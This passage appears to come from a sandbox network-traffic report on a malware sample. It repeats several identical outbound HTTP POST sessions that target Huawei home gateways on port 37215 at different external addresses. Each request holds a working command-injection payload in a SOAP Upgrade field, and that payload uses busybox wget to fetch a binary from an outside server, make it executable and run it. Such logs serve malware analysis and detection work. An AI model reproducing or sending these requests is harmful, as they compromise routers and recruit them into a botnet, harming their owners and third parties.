                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            894192.168.2.154632441.192.167.737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744570971 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            895192.168.2.153888241.0.203.21437215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744580030 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            896192.168.2.154314241.245.230.4537215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744596004 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            897192.168.2.154883441.78.118.10037215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744662046 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            898192.168.2.155643041.30.26.737215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744666100 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            899192.168.2.155748841.35.84.22237215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744704962 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            900192.168.2.154971641.155.152.22637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744723082 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            901192.168.2.156082841.229.193.18637215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744743109 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            902192.168.2.154596641.6.117.137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744775057 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
                                                                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 38 34 2e 35 34 2e 35 31 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d 70 2f 78 [TRUNCATED]
                                                                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 84.54.51.45 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            903192.168.2.153376041.130.157.12137215
                                                                            TimestampBytes transferredDirectionData
                                                                            Jun 8, 2024 15:05:09.744858027 CEST819OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                                            Connection: keep-alive
                                                                            Accept: */*
                                                                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                                            Content-Length: 450
